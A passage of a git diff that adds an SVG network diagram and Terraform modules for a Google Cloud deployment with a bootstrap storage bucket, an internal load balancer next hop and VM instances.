+                  <path d="M 348.8515 493.2848 L 343.0975 483.27873 C 342.63615 482.47986 341.8001 481.9929 340.93975 481.9929 L 329.4315 481.9929 C 328.5095 481.9929 327.70427 482.53345 327.27355 483.2781 L 321.51954 493.26424 C 321.05864 494.0629 321.0897 495.02037 321.5189 495.76587 L 327.2731 505.81765 C 327.73424 506.6163 328.5705 507.1492 329.43086 507.1492 L 340.93887 507.1492 C 341.86134 507.1492 342.66634 506.56797 343.09706 505.82334 L 348.85106 495.81684 C 349.3122 495.01796 349.2809 494.0301 348.8515 493.2848" fill="#4285f4"/>
+                </g>
+                <g id="Graphic_767">
+                  <title>Fill-4</title>
+                  <path d="M 347.20005 498.6879 L 337.73057 489.21843 L 337.05157 490.6882 L 335.575 489.21165 L 334.8914 490.67465 L 333.43213 489.21515 L 333.07316 490.9844 L 331.77422 491.20775 L 331.50472 492.36297 L 329.82407 492.7644 L 331.32994 494.27025 L 329.84025 494.9337 L 331.32994 496.4234 L 329.83063 497.0637 L 339.9159 507.14916 L 340.939 507.14916 C 341.86123 507.14916 342.66645 506.56794 343.09717 505.8233 Z" fill="black" fill-opacity=".07"/>
+                </g>
+                <g id="Graphic_766">
+                  <title>Fill-7</title>
+                  <path d="M 336.46073 493.06065 L 333.96522 493.06087 C 333.81866 493.0613 333.6999 493.17987 333.69944 493.32643 L 333.69966 495.8215 C 333.7003 495.96806 333.81866 496.0866 333.96522 496.0875 L 336.4605 496.0875 C 336.60707 496.08684 336.72563 495.96806 336.7263 495.8215 L 336.7263 493.32643 C 336.72585 493.17987 336.6073 493.0611 336.46073 493.06065" fill="white"/>
+                </g>
+                <g id="Graphic_765">
+                  <title>Fill-9</title>
+                  <path d="M 338.30088 497.6621 L 332.1247 497.6621 L 332.1247 491.4857 L 338.3013 491.4855 Z M 340.41116 492.85946 C 340.54263 492.859 340.64916 492.7525 340.6496 492.621 L 340.6496 492.2325 C 340.64916 492.10106 340.54263 491.99475 340.41116 491.9943 L 339.1973 491.9943 L 339.1973 490.85965 C 339.19644 490.7133 339.0781 490.59474 338.93175 490.5941 L 337.7925 490.5941 L 337.7927 489.37565 C 337.79206 489.2442 337.68553 489.1381 337.5543 489.13743 L 337.16556 489.13787 C 337.0343 489.1383 336.9278 489.2444 336.92712 489.37565 L 336.92756 490.59387 L 335.6457 490.59387 L 335.6457 489.37543 C 335.64503 489.2442 335.5387 489.13787 335.40747 489.1372 L 335.01853 489.13765 C 334.88706 489.1381 334.78075 489.2444 334.7801 489.37565 L 334.78053 490.59387 L 333.49865 490.5941 L 333.49865 489.37543 C 333.498 489.2442 333.3917 489.13787 333.26043 489.1372 L 332.8715 489.13765 C 332.74025 489.1381 332.63393 489.2444 332.63328 489.37565 L 332.6335 490.5941 L 331.49446 490.5941 C 331.3479 490.5945 331.22934 490.71287 331.2287 490.85943 L 331.2287 491.9941 L 330.01484 491.9941 C 329.8836 491.99475 329.77727 492.10106 329.7766 492.2323 L 329.77706 492.62146 C 329.7775 492.7527 329.8838 492.859 330.01506 492.85946 L 331.2287 492.85946 L 331.2289 494.14156 L 330.01484 494.1411 C 329.8836 494.1418 329.77727 494.2481 329.77684 494.37934 L 329.77706 494.76806 C 329.77727 494.8995 329.8836 495.00584 330.01506 495.0063 L 331.2289 495.0063 L 331.2289 496.2884 L 330.01484 496.28815 C 329.8836 496.2888 329.77727 496.3951 329.77684 496.5264 L 329.77706 496.9149 C 329.77727 497.04634 329.8836 497.1529 330.01506 497.1533 L 331.2289 497.1533 L 331.2289 498.2884 C 331.22956 498.43497 331.34812 498.5533 331.49446 498.55397 L 332.6335 498.55397 L 332.6335 499.77197 C 332.63393 499.90344 332.74025 500.00997 332.8717 500.0104 L 333.2602 500.0104 C 333.3917 500.00997 333.498 499.9032 333.4982 499.77197 L 333.49843 498.55397 L 334.7801 498.55397 L 334.7803 499.77197 C 334.78053 499.90344 334.88706 500.00997 335.01875 500.0104 L 335.40725 500.0104 C 335.5387 500.00997 335.64503 499.9032 335.64525 499.77197 L 335.64547 498.55397 L 336.92712 498.55397 L 336.92734 499.77197 C 336.9278 499.90344 337.0341 500.00997 337.1658 500.0104 L 337.55406 500.0104 C 337.68553 500.00997 337.7923 499.90344 337.7925 499.77197 L 337.7927 498.55397 L 338.93153 498.55397 C 339.07788 498.5533 339.19644 498.43497 339.1971 498.2884 L 339.1973 497.1533 L 340.41116 497.1531 C 340.54263 497.1529 340.64916 497.04656 340.6496 496.9151 L 340.6496 496.5266 C 340.64938 496.3951 340.54263 496.2886 340.41116 496.2884 L 339.1973 496.2884 L 339.1973 495.0063 L 340.41116 495.00606 C 340.54263 495.00584 340.64916 494.8995 340.6496 494.76806 L 340.6496 494.3798 C 340.64916 494.2483 340.54263 494.14156 340.41116 494.14134 L 339.1973 494.14134 L 339.1973 492.85946 Z" fill="white"/>
+                </g>
+              </g>
+            </g>
+          </g>
+          <g id="Group_1259">
+            <g id="Graphic_1260">
+              <path d="M 103.5 517.33333 L 99.5 517.33333 C 99.2 517.33333 99 517.13333 99 516.83333 C 99 516.53333 99.2 516.33333 99.5 516.33333 L 103.5 516.33333 C 103.8 516.33333 104 516.53333 104 516.83333 C 104 517.13333 103.8 517.33333 103.5 517.33333 Z M 95.5 517.33333 L 91.5 517.33333 C 91.2 517.33333 91 517.13333 91 516.83333 C 91 516.53333 91.2 516.33333 91.5 516.33333 L 95.5 516.33333 C 95.8 516.33333 96 516.53333 96 516.83333 C 96 517.13333 95.8 517.33333 95.5 517.33333 Z M 87.5 517.33333 L 83.5 517.33333 C 83.2 517.33333 83 517.13333 83 516.83333 C 83 516.53333 83.2 516.33333 83.5 516.33333 L 87.5 516.33333 C 87.8 516.33333 88 516.53333 88 516.83333 C 88 517.13333 87.8 517.33333 87.5 517.33333 Z M 79.5 517.33333 L 75.5 517.33333 C 75.2 517.33333 75 517.13333 75 516.83333 C 75 516.53333 75.2 516.33333 75.5 516.33333 L 79.5 516.33333 C 79.8 516.33333 80 516.53333 80 516.83333 C 80 517.13333 79.8 517.33333 79.5 517.33333 Z M 71.5 517.33333 L 67.5 517.33333 C 67.2 517.33333 67 517.13333 67 516.83333 C 67 516.53333 67.2 516.33333 67.5 516.33333 L 71.5 516.33333 C 71.8 516.33333 72 516.53333 72 516.83333 C 72 517.13333 71.8 517.33333 71.5 517.33333 Z M 63.5 517.33333 L 59.5 517.33333 C 59.2 517.33333 59 517.13333 59 516.83333 C 59 516.53333 59.2 516.33333 59.5 516.33333 L 63.5 516.33333 C 63.8 516.33333 64 516.53333 64 516.83333 C 64 517.13333 63.8 517.33333 63.5 517.33333 Z M 55.5 517.33333 L 51.5 517.33333 C 51.2 517.33333 51 517.13333 51 516.83333 C 51 516.53333 51.2 516.33333 51.5 516.33333 L 55.5 516.33333 C 55.8 516.33333 56 516.53333 56 516.83333 C 56 517.13333 55.8 517.33333 55.5 517.33333 Z M 51.5 513.33333 C 51.2 513.33333 51 513.13333 51 512.83333 L 51 508.83333 C 51 508.53333 51.2 508.33333 51.5 508.33333 C 51.8 508.33333 52 508.53333 52 508.83333 L 52 512.83333 C 52 513.13333 51.8 513.33333 51.5 513.33333 Z M 51.5 505.33333 C 51.2 505.33333 51 505.13333 51 504.83333 L 51 500.83333 C 51 500.53333 51.2 500.33333 51.5 500.33333 C 51.8 500.33333 52 500.53333 52 500.83333 L 52 504.83333 C 52 505.13333 51.8 505.33333 51.5 505.33333 Z M 51.5 497.33333 C 51.2 497.33333 51 497.13333 51 496.83333 L 51 492.83333 C 51 492.53333 51.2 492.33333 51.5 492.33333 C 51.8 492.33333 52 492.53333 52 492.83333 L 52 496.83333 C 52 497.13333 51.8 497.33333 51.5 497.33333 Z M 51.5 489.33333 C 51.2 489.33333 51 489.13333 51 488.83333 L 51 484.83333 C 51 484.53333 51.2 484.33333 51.5 484.33333 C 51.8 484.33333 52 484.53333 52 484.83333 L 52 488.83333 C 52 489.13333 51.8 489.33333 51.5 489.33333 Z M 51.5 481.33333 C 51.2 481.33333 51 481.13333 51 480.83333 L 51 476.83333 C 51 476.53333 51.2 476.33333 51.5 476.33333 C 51.8 476.33333 52 476.53333 52 476.83333 L 52 480.83333 C 52 481.13333 51.8 481.33333 51.5 481.33333 Z M 51.5 473.33333 C 51.2 473.33333 51 473.13333 51 472.83333 L 51 468.83333 C 51 468.53333 51.2 468.33333 51.5 468.33333 C 51.8 468.33333 52 468.53333 52 468.83333 L 52 472.83333 C 52 473.13333 51.8 473.33333 51.5 473.33333 Z M 51.5 465.33333 C 51.2 465.33333 51 465.13333 51 464.83333 L 51 460.83333 C 51 460.53333 51.2 460.33333 51.5 460.33333 C 51.8 460.33333 52 460.53333 52 460.83333 L 52 464.83333 C 52 465.13333 51.8 465.33333 51.5 465.33333 Z M 51.5 457.33333 C 51.2 457.33333 51 457.13333 51 456.83333 L 51 452.83333 C 51 452.53333 51.2 452.33333 51.5 452.33333 C 51.8 452.33333 52 452.53333 52 452.83333 L 52 456.83333 C 52 457.13333 51.8 457.33333 51.5 457.33333 Z M 51.5 449.33333 C 51.2 449.33333 51 449.13333 51 448.83333 L 51 444.83333 C 51 444.53333 51.2 444.33333 51.5 444.33333 C 51.8 444.33333 52 444.53333 52 444.83333 L 52 448.83333 C 52 449.13333 51.8 449.33333 51.5 449.33333 Z M 51.5 441.33333 C 51.2 441.33333 51 441.13333 51 440.83333 L 51 436.83333 C 51 436.53333 51.2 436.33333 51.5 436.33333 C 51.8 436.33333 52 436.53333 52 436.83333 L 52 440.83333 C 52 441.13333 51.8 441.33333 51.5 441.33333 Z M 51.5 433.33333 C 51.2 433.33333 51 433.13333 51 432.83333 L 51 428.83333 C 51 428.53333 51.2 428.33333 51.5 428.33333 C 51.8 428.33333 52 428.53333 52 428.83333 L 52 432.83333 C 52 433.13333 51.8 433.33333 51.5 433.33333 Z M 51.5 425.33333 C 51.2 425.33333 51 425.13333 51 424.83333 L 51 420.83333 C 51 420.53333 51.2 420.33333 51.5 420.33333 C 51.8 420.33333 52 420.53333 52 420.83333 L 52 424.83333 C 52 425.13333 51.8 425.33333 51.5 425.33333 Z M 51.5 417.33333 C 51.2 417.33333 51 417.13333 51 416.83333 L 51 412.83333 C 51 412.53333 51.2 412.33333 51.5 412.33333 C 51.8 412.33333 52 412.53333 52 412.83333 L 52 416.83333 C 52 417.13333 51.8 417.33333 51.5 417.33333 Z M 51.5 409.33333 C 51.2 409.33333 51 409.13333 51 408.83333 L 51 404.83333 C 51 404.53333 51.2 404.33333 51.5 404.33333 C 51.8 404.33333 52 404.53333 52 404.83333 L 52 408.83333 C 52 409.13333 51.8 409.33333 51.5 409.33333 Z M 51.5 401.33333 C 51.2 401.33333 51 401.13333 51 400.83333 L 51 396.83333 C 51 396.53333 51.2 396.33333 51.5 396.33333 C 51.8 396.33333 52 396.53333 52 396.83333 L 52 400.83333 C 52 401.13333 51.8 401.33333 51.5 401.33333 Z M 51.5 393.33333 C 51.2 393.33333 51 393.13333 51 392.83333 L 51 388.83333 C 51 388.53333 51.2 388.33333 51.5 388.33333 C 51.8 388.33333 52 388.53333 52 388.83333 L 52 392.83333 C 52 393.13333 51.8 393.33333 51.5 393.33333 Z M 51.5 385.33333 C 51.2 385.33333 51 385.13333 51 384.83333 L 51 380.83333 C 51 380.53333 51.2 380.33333 51.5 380.33333 C 51.8 380.33333 52 380.53333 52 380.83333 L 52 384.83333 C 52 385.13333 51.8 385.33333 51.5 385.33333 Z M 51.5 377.33333 C 51.2 377.33333 51 377.13333 51 376.83333 L 51 372.83333 C 51 372.53333 51.2 372.33333 51.5 372.33333 C 51.8 372.33333 52 372.53333 52 372.83333 L 52 376.83333 C 52 377.13333 51.8 377.33333 51.5 377.33333 Z M 51.5 369.33333 C 51.2 369.33333 51 369.13333 51 368.83333 L 51 364.83333 C 51 364.53333 51.2 364.33333 51.5 364.33333 C 51.8 364.33333 52 364.53333 52 364.83333 L 52 368.83333 C 52 369.13333 51.8 369.33333 51.5 369.33333 Z M 51.5 361.33333 C 51.2 361.33333 51 361.13333 51 360.83333 L 51 356.83333 C 51 356.53333 51.2 356.33333 51.5 356.33333 C 51.8 356.33333 52 356.53333 52 356.83333 L 52 360.83333 C 52 361.13333 51.8 361.33333 51.5 361.33333 Z M 51.5 353.33333 C 51.2 353.33333 51 353.13333 51 352.83333 L 51 348.83333 C 51 348.53333 51.2 348.33333 51.5 348.33333 C 51.8 348.33333 52 348.53333 52 348.83333 L 52 352.83333 C 52 353.13333 51.8 353.33333 51.5 353.33333 Z M 51.5 345.33333 C 51.2 345.33333 51 345.13333 51 344.83333 L 51 340.83333 C 51 340.53333 51.2 340.33333 51.5 340.33333 C 51.8 340.33333 52 340.53333 52 340.83333 L 52 344.83333 C 52 345.13333 51.8 345.33333 51.5 345.33333 Z M 51.5 337.33333 C 51.2 337.33333 51 337.13333 51 336.83333 L 51 332.83333 C 51 332.53333 51.2 332.33333 51.5 332.33333 C 51.8 332.33333 52 332.53333 52 332.83333 L 52 336.83333 C 52 337.13333 51.8 337.33333 51.5 337.33333 Z M 51.5 329.33333 C 51.2 329.33333 51 329.13333 51 328.83333 L 51 324.83333 C 51 324.53333 51.2 324.33333 51.5 324.33333 C 51.8 324.33333 52 324.53333 52 324.83333 L 52 328.83333 C 52 329.13333 51.8 329.33333 51.5 329.33333 Z M 51.5 321.33333 C 51.2 321.33333 51 321.13333 51 320.83333 L 51 316.83333 C 51 316.53333 51.2 316.33333 51.5 316.33333 C 51.8 316.33333 52 316.53333 52 316.83333 L 52 320.83333 C 52 321.13333 51.8 321.33333 51.5 321.33333 Z M 51.5 313.33333 C 51.2 313.33333 51 313.13333 51 312.83333 L 51 308.83333 C 51 308.53333 51.2 308.33333 51.5 308.33333 C 51.8 308.33333 52 308.53333 52 308.83333 L 52 312.83333 C 52 313.13333 51.8 313.33333 51.5 313.33333 Z M 51.5 305.33333 C 51.2 305.33333 51 305.13333 51 304.83333 L 51 300.83333 C 51 300.53333 51.2 300.33333 51.5 300.33333 C 51.8 300.33333 52 300.53333 52 300.83333 L 52 304.83333 C 52 305.13333 51.8 305.33333 51.5 305.33333 Z M 51.5 297.33333 C 51.2 297.33333 51 297.13333 51 296.83333 L 51 292.83333 C 51 292.53333 51.2 292.33333 51.5 292.33333 C 51.8 292.33333 52 292.53333 52 292.83333 L 52 296.83333 C 52 297.13333 51.8 297.33333 51.5 297.33333 Z M 51.5 289.33333 C 51.2 289.33333 51 289.13333 51 288.83333 L 51 284.83333 C 51 284.53333 51.2 284.33333 51.5 284.33333 C 51.8 284.33333 52 284.53333 52 284.83333 L 52 288.83333 C 52 289.13333 51.8 289.33333 51.5 289.33333 Z M 51.5 281.33333 C 51.2 281.33333 51 281.13333 51 280.83333 L 51 276.83333 C 51 276.53333 51.2 276.33333 51.5 276.33333 C 51.8 276.33333 52 276.53333 52 276.83333 L 52 280.83333 C 52 281.13333 51.8 281.33333 51.5 281.33333 Z M 51.5 273.33333 C 51.2 273.33333 51 273.13333 51 272.83333 L 51 268.83333 C 51 268.53333 51.2 268.33333 51.5 268.33333 C 51.8 268.33333 52 268.53333 52 268.83333 L 52 272.83333 C 52 273.13333 51.8 273.33333 51.5 273.33333 Z M 51.5 265.33333 C 51.2 265.33333 51 265.13333 51 264.83333 L 51 260.83333 C 51 260.53333 51.2 260.33333 51.5 260.33333 C 51.8 260.33333 52 260.53333 52 260.83333 L 52 264.83333 C 52 265.13333 51.8 265.33333 51.5 265.33333 Z M 51.5 257.33333 C 51.2 257.33333 51 257.13333 51 256.83333 L 51 252.83333 C 51 252.53333 51.2 252.33333 51.5 252.33333 C 51.8 252.33333 52 252.53333 52 252.83333 L 52 256.83333 C 52 257.13333 51.8 257.33333 51.5 257.33333 Z M 51.5 249.33333 C 51.2 249.33333 51 249.13333 51 248.83333 L 51 244.83333 C 51 244.53333 51.2 244.33333 51.5 244.33333 C 51.8 244.33333 52 244.53333 52 244.83333 L 52 248.83333 C 52 249.13333 51.8 249.33333 51.5 249.33333 Z M 51.5 241.33333 C 51.2 241.33333 51 241.13333 51 240.83333 L 51 236.83333 C 51 236.53333 51.2 236.33333 51.5 236.33333 C 51.8 236.33333 52 236.53333 52 236.83333 L 52 240.83333 C 52 241.13333 51.8 241.33333 51.5 241.33333 Z M 51.5 233.33333 C 51.2 233.33333 51 233.13333 51 232.83333 L 51 228.83333 C 51 228.53333 51.2 228.33333 51.5 228.33333 C 51.8 228.33333 52 228.53333 52 228.83333 L 52 232.83333 C 52 233.13333 51.8 233.33333 51.5 233.33333 Z M 51.5 225.33333 C 51.2 225.33333 51 225.13333 51 224.83333 L 51 220.83333 C 51 220.53333 51.2 220.33333 51.5 220.33333 C 51.8 220.33333 52 220.53333 52 220.83333 L 52 224.83333 C 52 225.13333 51.8 225.33333 51.5 225.33333 Z M 51.5 217.33333 C 51.2 217.33333 51 217.13333 51 216.83333 L 51 212.83333 C 51 212.53333 51.2 212.33333 51.5 212.33333 C 51.8 212.33333 52 212.53333 52 212.83333 L 52 216.83333 C 52 217.13333 51.8 217.33333 51.5 217.33333 Z M 51.5 209.33333 C 51.2 209.33333 51 209.13333 51 208.83333 L 51 204.83333 C 51 204.53333 51.2 204.33333 51.5 204.33333 C 51.8 204.33333 52 204.53333 52 204.83333 L 52 208.83333 C 52 209.13333 51.8 209.33333 51.5 209.33333 Z M 51.5 201.33333 C 51.2 201.33333 51 201.13333 51 200.83333 L 51 196.83333 C 51 196.53333 51.2 196.33333 51.5 196.33333 C 51.8 196.33333 52 196.53333 52 196.83333 L 52 200.83333 C 52 201.13333 51.8 201.33333 51.5 201.33333 Z M 51.5 193.33333 C 51.2 193.33333 51 193.13333 51 192.83333 L 51 188.83333 C 51 188.53333 51.2 188.33333 51.5 188.33333 C 51.8 188.33333 52 188.53333 52 188.83333 L 52 192.83333 C 52 193.13333 51.8 193.33333 51.5 193.33333 Z M 51.5 185.33333 C 51.2 185.33333 51 185.13333 51 184.83333 L 51 180.83333 C 51 180.53333 51.2 180.33333 51.5 180.33333 C 51.8 180.33333 52 180.53333 52 180.83333 L 52 184.83333 C 52 185.13333 51.8 185.33333 51.5 185.33333 Z M 51.5 177.33333 C 51.2 177.33333 51 177.13333 51 176.83333 L 51 172.83333 C 51 172.53333 51.2 172.33333 51.5 172.33333 C 51.8 172.33333 52 172.53333 52 172.83333 L 52 176.83333 C 52 177.13333 51.8 177.33333 51.5 177.33333 Z M 51.5 169.33333 C 51.2 169.33333 51 169.13333 51 168.83333 L 51 164.83333 C 51 164.53333 51.2 164.33333 51.5 164.33333 C 51.8 164.33333 52 164.53333 52 164.83333 L 52 168.83333 C 52 169.13333 51.8 169.33333 51.5 169.33333 Z M 51.5 161.33333 C 51.2 161.33333 51 161.13333 51 160.83333 L 51 156.83333 C 51 156.53333 51.2 156.33333 51.5 156.33333 C 51.8 156.33333 52 156.53333 52 156.83333 L 52 160.83333 C 52 161.13333 51.8 161.33333 51.5 161.33333 Z M 51.5 153.33333 C 51.2 153.33333 51 153.13333 51 152.83333 L 51 148.83333 C 51 148.53333 51.2 148.33333 51.5 148.33333 C 51.8 148.33333 52 148.53333 52 148.83333 L 52 152.83333 C 52 153.13333 51.8 153.33333 51.5 153.33333 Z M 51.5 145.33333 C 51.2 145.33333 51 145.13333 51 144.83333 L 51 140.83333 C 51 140.53333 51.2 140.33333 51.5 140.33333 C 51.8 140.33333 52 140.53333 52 140.83333 L 52 144.83333 C 52 145.13333 51.8 145.33333 51.5 145.33333 Z M 51.5 137.33333 C 51.2 137.33333 51 137.13333 51 136.83333 L 51 132.83333 C 51 132.53333 51.2 132.33333 51.5 132.33333 C 51.8 132.33333 52 132.53333 52 132.83333 L 52 136.83333 C 52 137.13333 51.8 137.33333 51.5 137.33333 Z M 51.5 129.33333 C 51.2 129.33333 51 129.13333 51 128.83333 L 51 124.83333 C 51 124.53333 51.2 124.33333 51.5 124.33333 C 51.8 124.33333 52 124.53333 52 124.83333 L 52 128.83333 C 52 129.13333 51.8 129.33333 51.5 129.33333 Z M 51.5 121.33333 C 51.2 121.33333 51 121.13333 51 120.83333 L 51 116.83333 C 51 116.53333 51.2 116.33333 51.5 116.33333 C 51.8 116.33333 52 116.53333 52 116.83333 L 52 120.83333 C 52 121.13333 51.8 121.33333 51.5 121.33333 Z M 51.5 113.33333 C 51.2 113.33333 51 113.13333 51 112.83333 L 51 110.83333 C 51 110.53333 51.2 110.33333 51.5 110.33333 L 53.5 110.33333 C 53.8 110.33333 54 110.53333 54 110.83333 C 54 111.13333 53.8 111.33333 53.5 111.33333 L 52 111.33333 L 52 112.83333 C 52 113.13333 51.8 113.33333 51.5 113.33333 Z M 101.5 111.33333 L 97.5 111.33333 C 97.2 111.33333 97 111.13333 97 110.83333 C 97 110.53333 97.2 110.33333 97.5 110.33333 L 101.5 110.33333 C 101.8 110.33333 102 110.53333 102 110.83333 C 102 111.13333 101.8 111.33333 101.5 111.33333 Z M 93.5 111.33333 L 89.5 111.33333 C 89.2 111.33333 89 111.13333 89 110.83333 C 89 110.53333 89.2 110.33333 89.5 110.33333 L 93.5 110.33333 C 93.8 110.33333 94 110.53333 94 110.83333 C 94 111.13333 93.8 111.33333 93.5 111.33333 Z M 85.5 111.33333 L 81.5 111.33333 C 81.2 111.33333 81 111.13333 81 110.83333 C 81 110.53333 81.2 110.33333 81.5 110.33333 L 85.5 110.33333 C 85.8 110.33333 86 110.53333 86 110.83333 C 86 111.13333 85.8 111.33333 85.5 111.33333 Z M 77.5 111.33333 L 73.5 111.33333 C 73.2 111.33333 73 111.13333 73 110.83333 C 73 110.53333 73.2 110.33333 73.5 110.33333 L 77.5 110.33333 C 77.8 110.33333 78 110.53333 78 110.83333 C 78 111.13333 77.8 111.33333 77.5 111.33333 Z M 69.5 111.33333 L 65.5 111.33333 C 65.2 111.33333 65 111.13333 65 110.83333 C 65 110.53333 65.2 110.33333 65.5 110.33333 L 69.5 110.33333 C 69.8 110.33333 70 110.53333 70 110.83333 C 70 111.13333 69.8 111.33333 69.5 111.33333 Z M 61.5 111.33333 L 57.5 111.33333 C 57.2 111.33333 57 111.13333 57 110.83333 C 57 110.53333 57.2 110.33333 57.5 110.33333 L 61.5 110.33333 C 61.8 110.33333 62 110.53333 62 110.83333 C 62 111.13333 61.8 111.33333 61.5 111.33333 Z" fill="#616161"/>
+            </g>
+          </g>
+        </g>
+      </g>
+    </g>
+  </g>
+</svg>
diff --git a/gcp/ilbnh-mig/images/directory.png b/gcp/ilbnh-mig/images/directory.png
new file mode 100644
index 00000000..8317ff94
Binary files /dev/null and b/gcp/ilbnh-mig/images/directory.png differ
diff --git a/gcp/ilbnh-mig/images/fwlogs.png b/gcp/ilbnh-mig/images/fwlogs.png
new file mode 100644
index 00000000..52ea690c
Binary files /dev/null and b/gcp/ilbnh-mig/images/fwlogs.png differ
diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf
new file mode 100644
index 00000000..a93e7956
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf
@@ -0,0 +1,85 @@
+locals {
+  bucket_name = join("", [var.bucket_name, random_string.randomstring.result])
+}
+resource "random_string" "randomstring" {
+  length      = 25
+  min_lower   = 15
+  min_numeric = 10
+  special     = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+  name          = local.bucket_name
+  force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+  count  = length(var.config) > 0 ? length(var.config) : "0"
+  name   = "config/${element(var.config, count.index)}"
+  source = "${var.file_location}${element(var.config, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_full" {
+  count  = length(var.content) > 0 ? length(var.content) : "0"
+  name   = "content/${element(var.content, count.index)}"
+  source = "${var.file_location}${element(var.content, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_full" {
+  count  = length(var.license) > 0 ? length(var.license) : "0"
+  name   = "license/${element(var.license, count.index)}"
+  source = "${var.file_location}${element(var.license, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_full" {
+  count  = length(var.software) > 0 ? length(var.software) : "0"
+  name   = "software/${element(var.software, count.index)}"
+  source = "${var.file_location}${element(var.software, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "config_empty" {
+  count   = length(var.config) == 0 ? 1 : 0
+  name    = "config/"
+  content = "config/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+  count   = length(var.content) == 0 ? 1 : 0
+  name    = "content/"
+  content = "content/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+  count   = length(var.license) == 0 ? 1 : 0
+  name    = "license/"
+  content = "license/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+  count   = length(var.software) == 0 ? 1 : 0
+  name    = "software/"
+  content = "software/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    google_storage_bucket.bootstrap,
+    google_storage_bucket_object.config_full,
+    google_storage_bucket_object.content_full,
+    google_storage_bucket_object.license_full,
+    google_storage_bucket_object.software_full,
+    google_storage_bucket_object.config_empty,
+    google_storage_bucket_object.content_empty,
+    google_storage_bucket_object.license_empty,
+    google_storage_bucket_object.software_empty,
+  ]
+}
+
diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf
new file mode 100644
index 00000000..ef7f162d
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf
@@ -0,0 +1,8 @@
+output completion {
+  value = null_resource.dependency_setter.id
+}
+
+output bucket_name {
+  value = google_storage_bucket.bootstrap.name
+}
+
diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf
new file mode 100644
index 00000000..0db2b8fd
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf
@@ -0,0 +1,24 @@
+variable bucket_name {
+}
+
+variable file_location {
+}
+
+variable config {
+  type    = list(string)
+  default = []
+}
+
+variable content {
+  type    = list(string)
+  default = []
+}
+
+variable license {
+  type    = list(string)
+  default = []
+}
+
+variable software {
+  default = []
+}
diff --git a/gcp/ilbnh-mig/modules/ilbnh/main.tf b/gcp/ilbnh-mig/modules/ilbnh/main.tf
new file mode 100644
index 00000000..e3491df0
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/ilbnh/main.tf
@@ -0,0 +1,27 @@
+#-----------------------------------------------------------------------------------------------
+# Create the internal load balancers, one for the testing network and one for the production network.
+# This resource will destroy (potentially immediately) after null_resource.next
+resource "google_compute_region_backend_service" "default" {
+  provider              = "google-beta"
+  name                  = var.name
+  project               = var.project_id
+  load_balancing_scheme = "INTERNAL"
+  health_checks         = var.health_checks
+  region                = var.region
+  network               = var.network_uri
+
+  backend {
+    group               = var.group
+  }
+}
+
+resource "google_compute_forwarding_rule" "default" {
+  name                  = "fr-${var.name}"
+  region                = var.region
+  load_balancing_scheme = "INTERNAL"
+  backend_service       = google_compute_region_backend_service.default.id
+  all_ports             = var.all_ports
+  network               = var.network
+  subnetwork            = var.subnetwork
+  ip_address            = var.ip_address
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/ilbnh/outputs.tf b/gcp/ilbnh-mig/modules/ilbnh/outputs.tf
new file mode 100644
index 00000000..d99cc408
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/ilbnh/outputs.tf
@@ -0,0 +1,3 @@
+output forwarding_rule {
+  value = google_compute_forwarding_rule.default.self_link
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/ilbnh/variables.tf b/gcp/ilbnh-mig/modules/ilbnh/variables.tf
new file mode 100644
index 00000000..585f8276
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/ilbnh/variables.tf
@@ -0,0 +1,41 @@
+variable project_id {
+}
+
+variable region {
+}
+
+variable name {
+}
+
+variable health_checks {
+  type    = list(string)
+  default = []
+}
+
+variable group {
+}
+
+variable subnetwork {
+}
+
+variable ip_address {
+  default = null
+}
+
+variable ip_protocol {
+  default = "TCP"
+}
+variable all_ports {
+  type = bool
+}
+variable ports {
+  type    = list(string)
+  default = []
+}
+
+variable network {
+  default = null
+}
+
+variable network_uri {
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vm/main.tf b/gcp/ilbnh-mig/modules/vm/main.tf
new file mode 100644
index 00000000..fff23b2e
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vm/main.tf
@@ -0,0 +1,34 @@
+resource "google_compute_instance" "default" {
+  count                     = length(var.names)
+  name                      = element(var.names, count.index)
+  machine_type              = var.machine_type
+  zone                      = element(var.zones, count.index)
+  can_ip_forward            = false
+  allow_stopping_for_update = true
+  metadata_startup_script   = var.startup_script
+
+  metadata = {
+    serial-port-enable = true
+    ssh-keys           = var.ssh_key
+  }
+
+  network_interface {
+    dynamic "access_config" {
+      for_each = var.server_public_ip ? [""] : []
+      content {}
+    }
+    subnetwork = element(var.subnetworks, count.index)
+    network_ip = element(var.server_ips, count.index)
+
+  }
+
+  boot_disk {
+    initialize_params {
+      image = var.image
+    }
+  }
+
+  service_account {
+    scopes = var.scopes
+  }
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vm/outputs.tf b/gcp/ilbnh-mig/modules/vm/outputs.tf
new file mode 100644
index 00000000..75856670
